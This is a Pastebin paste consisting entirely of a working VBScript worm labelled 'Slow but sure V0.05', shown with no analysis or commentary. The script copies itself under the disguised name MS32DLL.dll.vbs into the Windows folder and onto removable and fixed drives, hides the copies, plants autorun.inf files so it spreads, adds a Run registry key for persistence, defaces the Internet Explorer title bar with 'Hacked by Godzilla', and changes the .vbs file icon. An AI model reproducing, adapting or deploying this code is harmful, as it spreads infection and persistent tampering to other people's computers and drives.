Advertisement
Guest User

Untitled

a guest
Jun 21st, 2017
68
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 'My name is Slow but sure V0.05
  2. on error resume next
  3. dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
  4. atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
  5. set fs = createobject("Scripting.FileSystemObject")
  6. set mf = fs.getfile(Wscript.ScriptFullname)
  7. dim text,size
  8. size = mf.size
  9. check = mf.drive.drivetype
  10. set text=mf.openastextstream(1,-2)
  11. do while not text.atendofstream
  12. mysource=mysource&text.readline
  13. mysource=mysource & vbcrlf
  14. loop
  15. do
  16. Set winpath = fs.getspecialfolder(0)
  17. set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
  18. tf.attributes = 32
  19. set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
  20. tf.write mysource
  21. tf.close
  22. set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
  23. tf.attributes = 39
  24. for each flashdrive in fs.drives
  25. If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
  26. set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
  27. tf.attributes =32
  28. set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
  29. tf.write mysource
  30. tf.close
  31. set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
  32. tf.attributes =39
  33. set tf =fs.getfile(flashdrive.path &"\autorun.inf")
  34. tf.attributes = 32
  35. set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
  36. tf.write atr
  37. tf.close
  38. set tf =fs.getfile(flashdrive.path &"\autorun.inf")
  39. tf.attributes=39
  40. end if
  41. next
  42. set rg = createobject("WScript.Shell")
  43. rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
  44. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Godzilla"
  45. rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
  46. if check <> 1 then
  47. Wscript.sleep 200000
  48. end if
  49. loop while check<>1
  50. set sd = createobject("Wscript.shell")
  51. sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement